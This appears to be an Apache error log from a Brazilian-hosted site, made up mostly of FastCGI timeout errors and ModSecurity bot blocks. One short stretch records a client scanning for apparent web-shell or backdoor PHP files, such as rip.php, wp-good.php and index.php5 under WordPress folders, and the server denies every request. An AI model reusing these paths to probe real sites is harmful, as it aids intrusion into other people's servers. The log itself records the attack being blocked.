[Tue Mar 17 12:55:06.168332 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.228.16:50340] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl5Wr-sgTmmJoPuMdyxHwAAAs4"]
[Tue Mar 17 12:55:18.070018 2026] [proxy_fcgi:error] [pid 17965:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:55:40.121759 2026] [proxy_fcgi:error] [pid 9155:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54908] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:56:04.073838 2026] [proxy_fcgi:error] [pid 7437:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55236] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:56:25.129830 2026] [proxy_fcgi:error] [pid 7437:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:56:46.129810 2026] [proxy_fcgi:error] [pid 17965:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:57:07.070037 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:56350] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:57:08.612766 2026] [:error] [pid 17965:tid 140411582465792] [client 74.7.244.31:45714] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl51Kt8Nd0UC_OcbVHFzAAAAJM"]
[Tue Mar 17 12:57:28.125824 2026] [proxy_fcgi:error] [pid 11293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:57:49.106894 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57142] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:58:10.137823 2026] [proxy_fcgi:error] [pid 2473:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57498] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:58:32.121784 2026] [proxy_fcgi:error] [pid 18380:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:58:53.138008 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:58592] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:59:14.130503 2026] [proxy_fcgi:error] [pid 11293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58954] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:59:37.126064 2026] [proxy_fcgi:error] [pid 11293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59290] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 12:59:58.157785 2026] [proxy_fcgi:error] [pid 2160:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59642] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:00:19.141799 2026] [proxy_fcgi:error] [pid 18380:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:00:30.700314 2026] [:error] [pid 9155:tid 140411632822016] [client 74.7.228.16:46106] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl6ntbI7zhHXcabyMU6JwAAAk0"]
[Tue Mar 17 13:00:40.093815 2026] [proxy_fcgi:error] [pid 17965:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:60254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:01:01.121788 2026] [proxy_fcgi:error] [pid 2160:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60824] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:01:26.126632 2026] [proxy_fcgi:error] [pid 7437:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33036] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:01:48.069823 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:33458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:02:09.033826 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33936] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:02:14.343437 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.244.31:43776] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl7BtCmCSWTlPouqorfNgAAAMk"]
[Tue Mar 17 13:02:30.129800 2026] [proxy_fcgi:error] [pid 18380:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:34422] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:02:51.125235 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34992] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:03:12.137848 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35368] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:03:33.123055 2026] [proxy_fcgi:error] [pid 9155:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35790] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:03:55.129791 2026] [proxy_fcgi:error] [pid 17965:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36270] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:04:16.781798 2026] [proxy_fcgi:error] [pid 18380:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:36666] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:04:38.129810 2026] [proxy_fcgi:error] [pid 2598:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37106] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:04:59.149787 2026] [proxy_fcgi:error] [pid 7437:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37592] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:05:20.121895 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:05:41.085866 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:06:02.132431 2026] [proxy_fcgi:error] [pid 19507:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39158] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:06:24.154067 2026] [proxy_fcgi:error] [pid 18380:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:06:49.123021 2026] [proxy_fcgi:error] [pid 2598:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:07:10.145817 2026] [proxy_fcgi:error] [pid 17965:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41146] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:07:31.053792 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41646] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:07:42.278694 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.244.31:46532] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl8Tqt8Nd0UC_OcbVHG7QAAAIk"]
[Tue Mar 17 13:07:52.125818 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42190] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:08:13.365789 2026] [proxy_fcgi:error] [pid 2598:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42694] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:08:35.146019 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:43366] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:08:56.129904 2026] [proxy_fcgi:error] [pid 18380:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43946] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:09:17.125802 2026] [proxy_fcgi:error] [pid 7437:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:09:40.145817 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44996] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:10:01.134271 2026] [proxy_fcgi:error] [pid 7437:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45488] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:10:23.037803 2026] [proxy_fcgi:error] [pid 17965:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45980] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:10:45.125812 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46472] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:11:06.149792 2026] [proxy_fcgi:error] [pid 9299:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:11:10.102656 2026] [:error] [pid 2598:tid 140411599251200] [client 74.7.228.16:53704] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl9Hhj0p0SRWAqcjGF1gAAAAxE"]
[Tue Mar 17 13:11:28.137774 2026] [proxy_fcgi:error] [pid 2160:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47600] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:11:52.141798 2026] [proxy_fcgi:error] [pid 18380:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:48378] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:12:13.125866 2026] [proxy_fcgi:error] [pid 11293:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:48958] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:12:35.125804 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49554] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:12:49.762399 2026] [:error] [pid 17965:tid 140411649607424] [client 74.7.244.31:34826] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abl9gat8Nd0UC_OcbVHHTwAAAIs"]
[Tue Mar 17 13:12:57.141838 2026] [proxy_fcgi:error] [pid 6296:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:50312] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:13:18.129796 2026] [proxy_fcgi:error] [pid 11293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50868] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:13:39.125879 2026] [proxy_fcgi:error] [pid 18380:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:51510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:14:00.185781 2026] [proxy_fcgi:error] [pid 2473:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:52246] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:14:21.537809 2026] [proxy_fcgi:error] [pid 9155:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52852] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:14:43.137792 2026] [proxy_fcgi:error] [pid 2160:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53496] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:15:04.149813 2026] [proxy_fcgi:error] [pid 11293:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:54064] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:15:25.324797 2026] [access_compat:error] [pid 19507:tid 140411599251200] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/rip.php
[Tue Mar 17 13:15:28.522796 2026] [access_compat:error] [pid 19507:tid 140411741927168] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/about.php
[Tue Mar 17 13:15:30.125792 2026] [proxy_fcgi:error] [pid 9299:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54730] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:15:34.722262 2026] [access_compat:error] [pid 19507:tid 140411674785536] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/ioxi-o.php
[Tue Mar 17 13:15:39.870412 2026] [access_compat:error] [pid 19507:tid 140411691570944] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/thickbox/index.php5
[Tue Mar 17 13:15:40.167729 2026] [access_compat:error] [pid 19507:tid 140411616036608] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 13:15:40.465392 2026] [access_compat:error] [pid 19507:tid 140411607643904] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/sf.php
[Tue Mar 17 13:15:42.025129 2026] [access_compat:error] [pid 19507:tid 140411716749056] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/images/index.php5
[Tue Mar 17 13:15:44.959946 2026] [access_compat:error] [pid 19507:tid 140411649607424] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/index.php5
[Tue Mar 17 13:15:45.574351 2026] [access_compat:error] [pid 19507:tid 140411557287680] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/plupload/index.php5
[Tue Mar 17 13:15:47.499190 2026] [access_compat:error] [pid 19507:tid 140411733534464] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/222.php
[Tue Mar 17 13:15:47.798575 2026] [access_compat:error] [pid 19507:tid 140411666392832] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/abcd.php
[Tue Mar 17 13:15:48.095971 2026] [access_compat:error] [pid 19507:tid 140411683178240] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/class-t.api.php
[Tue Mar 17 13:15:48.393562 2026] [access_compat:error] [pid 19507:tid 140411674785536] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/classwithtostring.php
[Tue Mar 17 13:15:48.703329 2026] [access_compat:error] [pid 19507:tid 140411574073088] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/file.php
[Tue Mar 17 13:15:49.000881 2026] [access_compat:error] [pid 19507:tid 140411725141760] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Tue Mar 17 13:15:49.299637 2026] [access_compat:error] [pid 19507:tid 140411624429312] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/css/colors/coffee/index.php5
[Tue Mar 17 13:15:49.603994 2026] [access_compat:error] [pid 19507:tid 140411708356352] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/js/widgets/index.php5
[Tue Mar 17 13:15:49.902379 2026] [access_compat:error] [pid 19507:tid 140411632822016] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/languages/index.php5
[Tue Mar 17 13:15:50.202112 2026] [access_compat:error] [pid 19507:tid 140411691570944] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/languages/plugins/index.php5
[Tue Mar 17 13:15:50.502504 2026] [access_compat:error] [pid 19507:tid 140411699963648] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/themes/twentytwentyfour/index.php5
[Tue Mar 17 13:15:50.803389 2026] [access_compat:error] [pid 19507:tid 140411616036608] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/upgrade/index.php5
[Tue Mar 17 13:15:51.102725 2026] [access_compat:error] [pid 19507:tid 140411599251200] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/uploads/index.php5
[Tue Mar 17 13:15:51.133939 2026] [proxy_fcgi:error] [pid 6296:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55362] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:15:51.401166 2026] [access_compat:error] [pid 19507:tid 140411607643904] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-good.php
[Tue Mar 17 13:15:53.180667 2026] [access_compat:error] [pid 19507:tid 140411641214720] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/jquery/index.php5
[Tue Mar 17 13:15:53.479614 2026] [access_compat:error] [pid 19507:tid 140411658000128] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/jquery/ui/index.php5
[Tue Mar 17 13:15:53.778238 2026] [access_compat:error] [pid 19507:tid 140411716749056] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/js/tinymce/themes/index.php5
[Tue Mar 17 13:15:54.077155 2026] [access_compat:error] [pid 19507:tid 140411741927168] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/rest-api/index.php5
[Tue Mar 17 13:15:56.020509 2026] [access_compat:error] [pid 19507:tid 140411649607424] [client 20.53.243.118:26287] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/fonts/index.php5
[Tue Mar 17 13:15:58.011451 2026] [cgid:error] [pid 19507:tid 140411557287680] [client 20.53.243.118:26287] AH01265: attempt to invoke directory as script: /var/www/cgi-bin/
[Tue Mar 17 13:16:12.129796 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56086] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:16:33.134646 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:56894] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:16:55.125787 2026] [proxy_fcgi:error] [pid 11293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:17:16.129849 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:17:37.835358 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:58536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:17:59.149814 2026] [proxy_fcgi:error] [pid 11293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59142] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:18:20.061869 2026] [proxy_fcgi:error] [pid 9155:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59704] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:18:41.125818 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:60246] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:19:02.138256 2026] [proxy_fcgi:error] [pid 18380:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33036] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:19:23.133859 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33674] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:19:44.106898 2026] [proxy_fcgi:error] [pid 9299:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34038] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:20:05.129812 2026] [proxy_fcgi:error] [pid 7437:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:34528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:20:26.041839 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:20:48.030192 2026] [proxy_fcgi:error] [pid 6296:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:35506] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:21:10.069832 2026] [proxy_fcgi:error] [pid 17965:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35920] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:21:31.085848 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:21:52.037904 2026] [proxy_fcgi:error] [pid 18380:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36322] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:22:14.073867 2026] [proxy_fcgi:error] [pid 17965:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36628] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:22:35.134964 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36940] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:22:56.101902 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:37196] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:23:17.127426 2026] [proxy_fcgi:error] [pid 18380:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37282] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:23:38.132830 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:24:00.037819 2026] [proxy_fcgi:error] [pid 7004:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37476] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:24:21.062110 2026] [proxy_fcgi:error] [pid 11293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:37568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:24:42.125263 2026] [proxy_fcgi:error] [pid 17965:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37688] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:25:03.133816 2026] [proxy_fcgi:error] [pid 9299:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37836] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:25:24.093795 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37944] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:25:45.121783 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38100] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:26:06.121932 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38244] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:26:27.129962 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38382] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:26:48.121809 2026] [proxy_fcgi:error] [pid 18380:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38530] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:27:09.129799 2026] [proxy_fcgi:error] [pid 7004:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:38624] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:27:31.067709 2026] [proxy_fcgi:error] [pid 18380:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38866] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:27:52.137972 2026] [proxy_fcgi:error] [pid 6296:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:39172] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:28:13.117869 2026] [proxy_fcgi:error] [pid 2598:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39510] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:28:34.117847 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39694] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:28:55.034966 2026] [proxy_fcgi:error] [pid 2473:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:39898] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:29:17.041931 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40136] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:29:38.125817 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:30:01.125786 2026] [proxy_fcgi:error] [pid 2598:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40656] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:30:22.101857 2026] [proxy_fcgi:error] [pid 2473:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40888] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:30:45.120819 2026] [proxy_fcgi:error] [pid 17965:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41162] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 13:31:08.045883 2026] [proxy_fcgi:error] [pid 18380:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41434] AH01075: Error dispatching request to : (polling)
